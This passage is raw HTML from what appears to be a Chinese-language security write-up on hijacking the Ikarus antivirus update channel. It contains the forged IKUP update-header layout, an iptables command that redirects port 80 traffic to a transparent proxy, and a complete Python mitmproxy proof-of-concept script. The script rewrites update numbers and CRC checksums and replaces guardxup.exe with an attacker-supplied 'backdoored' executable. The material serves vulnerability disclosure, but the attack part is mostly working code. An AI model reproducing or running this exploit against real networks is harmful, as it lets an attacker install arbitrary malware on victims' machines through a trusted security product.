class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60529924886288-5\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">html<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60529924886288-6\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">168<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60529924886288-7\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">close<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60529924886288-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60529924886288-9\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60529924886288-10\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">head<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">title<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">404<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">Not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Found<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">title<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">head<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60529924886288-11\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">body <\/span><span class=\"crayon-v\">bgcolor<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;white&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60529924886288-12\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">center<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">h1<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">404<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">Not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Found<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">h1<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">center<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60529924886288-13\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">hr<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">center<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">nginx<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.6.2<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">center<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60529924886288-14\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60529924886288-15\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60529924886288-16\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0016 seconds] -->  <\/p>\n<p>\u4f46\u6211\u4eec\u53ef\u4ee5\u7528IKUP\u683c\u5f0f\u4fee\u6539\u4e0a\u8ff0\u54cd\u5e94\uff1a<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a1c8f5d6052c215795329\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Bytes: 0x0 &#8211; 0x3 == IKUP # header  Bytes: 0x4 &#8211; 0x7 == 0x0s  Bytes: 0x8 == 0x3C # pointer to start of PE EXE MZ header  Bytes: 0x20 &#8211; 0x23 == update value in little endian (script fixes it up)  Bytes: 0x24 &#8211; 0x27 == crc32 checksum (script populates from provided binary)  Bytes: 0x28 -&gt; pointer to MZ header == 0x0s  Bytes: &#8216;pointer to MZ header&#8217; -&gt; ? == appended exe<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d6052c215795329-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d6052c215795329-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d6052c215795329-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d6052c215795329-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d6052c215795329-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d6052c215795329-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d6052c215795329-7\">7<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d6052c215795329-1\"><span class=\"crayon-v\">Bytes<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IKUP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># header<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d6052c215795329-2\"><span class=\"crayon-v\">Bytes<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0s<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d6052c215795329-3\"><span class=\"crayon-v\">Bytes<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x3C<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># pointer to start of PE EXE MZ header<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d6052c215795329-4\"><span class=\"crayon-v\">Bytes<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x20<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x23<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">update <\/span><span class=\"crayon-e\">value <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">little <\/span><span class=\"crayon-e\">endian<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">script <\/span><span class=\"crayon-e\">fixes <\/span><span class=\"crayon-e\">it <\/span><span class=\"crayon-v\">up<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d6052c215795329-5\"><span class=\"crayon-v\">Bytes<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x24<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x27<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">crc32 <\/span><span class=\"crayon-e\">checksum<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">script <\/span><span class=\"crayon-e\">populates <\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">provided <\/span><span class=\"crayon-v\">binary<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d6052c215795329-6\"><span class=\"crayon-v\">Bytes<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x28<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">pointer <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">MZ <\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0s<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d6052c215795329-7\"><span class=\"crayon-v\">Bytes<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;pointer to MZ header&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">appended <\/span><span class=\"crayon-v\">exe<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0014 seconds] -->  <\/p>\n<p>\u7136\u540e\uff0c\u6211\u4eec\u5c06\u4fee\u6539\u8fc7\u540e\u7684\u54cd\u5e94\u8f6c\u53d1\u5230\u5ba2\u6237\u7aef\uff0c\u5728\u90a3\u91cc\u7528\u6211\u4eec\u7684\u53ef\u6267\u884c\u6587\u4ef6\u66ff\u6362guardxup.exe\u3002<\/p>\n<p><strong>\u6f0f\u6d1e\u8bc1\u660e<\/strong><br \/> \u5b89\u88c5mitmproxy 0.17 &#8211; pip install mitmproxy == 0.17<\/p>\n<p>\u8981\u4f7f\u7528\u8fd9\u4e2a\u811a\u672c\uff0c\u5728\u900f\u660e\u4ee3\u7406\u6a21\u5f0f\u4e0b\uff0c\u901a\u8fc7\u4e2d\u95f4\u4eba80\u7aef\u53e3\u8f6c\u53d1\u5ba2\u6237\u7aef\u7684\u901a\u4fe1\u6d41\u91cf\u3002<\/p>\n<p>\u8bbe\u7f6e\u4f60\u7684\u9632\u706b\u5899\u89c4\u5219\u4ee5\u62e6\u622a8080\u7aef\u53e3\u4e0a\u7684\u901a\u4fe1\u6d41\u91cf\uff1a<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a1c8f5d6052e021217181\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> sudo iptables -t nat -A PREROUTING -p tcp &#8211;destination-port 80 -j REDIRECT &#8211;to-port 8080<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d6052e021217181-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d6052e021217181-1\"><span class=\"crayon-e\">sudo <\/span><span class=\"crayon-v\">iptables<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nat<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">A<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PREROUTING<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tcp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-v\">destination<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">80<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">REDIRECT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8080<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0006 seconds] -->  <\/p>\n<p>\u7136\u540e\u6267\u884c\u5982\u4e0b\u811a\u672c\uff1a<\/p>\n<p>.\/poc.py file_to_deploy.exe<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a1c8f5d60531148303101\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/env python2  import os  try:      from mitmproxy import controller, proxy, platform      from mitmproxy.proxy.server import ProxyServer  except:      from libmproxy import controller, proxy, platform      from libmproxy.proxy.server import ProxyServer    import re  import struct  import sys  import zlib  import bz2    class IkarusPOC(controller.Master):      def __init__(self, server, backdoored_file):          controller.Master.__init__(self, server)          self.ikarus= {}          self.crc_file = 0          self.backdoored_file = backdoored_file          self.to_replace = 0          self.already_patched = 0          self.update_number = 0         def win_header(self):          self.update_header = &#8220;x49x4Bx55x50x00x00x00x00x3Cx00x00x00x00x00x00x00&#8221;          self.update_header += &#8220;x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00&#8221;            self.update_header += struct.pack(&#8220;&lt;I&#8221;, self.to_replace)        # update number          self.update_header += struct.pack(&#8220;&lt;I&#8221;, self.crc_file)          # checksum          self.update_header += &#8220;x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00&#8221;          self.update_header += &#8220;x00x00x00x00&#8243;        def run(self):          try:              return controller.Master.run(self)          except KeyboardInterrupt:              self.shutdown()        def crc_stream(self, a_string):          prev = 0          return zlib.crc32(a_string, prev) &amp; 0xFFFFFFFF        def crc(self, some_file):          prev = 0          for eachLine in open(some_file,&#8221;rb&#8221;):              prev = zlib.crc32(eachLine, prev)          self.crc_file = prev &amp; 0xFFFFFFFF           print &#8220;[*] crc_file&#8221;, self.crc_file        def handle_request(self, flow):          hid = (flow.request.host, flow.request.port)          flow.reply()        def handle_response(self, flow):          print &#8220;[*] flow.request.host:&#8221;, flow.request.host          if &#8220;cgi-bin\/imsa-lite.pl&#8221; in flow.request.path and &#8220;Dalvik&#8221; in flow.request.headers[&#8216;User-Agent&#8217;] and self.already_patched &lt;=2:              content = flow.reply.obj.response.content              p = re.compile(&#8220;antispam[s|t].*n&#8221;)              result = p.search(content)              the_result = result.group(0)                            original_update_number= [int(s) for s in the_result.split() if s.isdigit()][0]              if self.update_number == 0:                  self.update_number = original_update_number              self.to_replace = self.update_number + 1              content = content.replace(str(original_update_number), str(self.to_replace))              flow.reply.obj.response.content = content            if &#8220;cgi-bin\/virusutilities.pl&#8221; in flow.request.path and &#8216;virusutilities&#8217; in flow.request.headers[&#8216;User-Agent&#8217;] and self.already_patched &lt;= 2:   \t    print &#8220;[*] Found update response, modifying&#8230;&#8221;              content = flow.reply.obj.response.content              p = re.compile(&#8220;update[s|t].*n&#8221;)              result = p.search(content)              the_result = result.group(0)              original_update_number = [int(s) for s in the_result.split() if s.isdigit()][0]              if self.update_number == 0:                  self.update_number = original_update_number              self.to_replace = self.update_number + 1              print &#8216;[*] Update_number&#8217;, self.update_number              print &#8216;[*] Replace number&#8217;, self.to_replace              content = content.replace(str(original_update_number), str(self.to_replace))              print &#8220;[*] Updated content&#8221;, content              flow.reply.obj.response.content = content             if &#8216;guard&#8217; in flow.request.path and &#8216;full&#8217; in flow.request.path and self.already_patched &lt;= 2:              print &#8216;[*] Found guardxup.exe request! Modifying request and pushing provided file!&#8217;                self.crc(self.backdoored_file)              self.win_header()              with open(self.backdoored_file, &#8216;rb&#8217;) as f:                  file_out  = f.read()              content = self.update_header + file_out                   with open(&#8216;\/tmp\/update_test.full&#8217;, &#8216;wb&#8217;) as f:                  f.write(content)              flow.reply.obj.response.content = content               flow.reply.obj.response.status_code = 200              self.already_patched += 1           flow.reply()      config = proxy.ProxyConfig(port=8080, mode=&#8217;transparent&#8217;)  server = ProxyServer(config)  m = IkarusPOC(server, sys.argv[1])  m.run()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-49\">49<\/div>\n<div 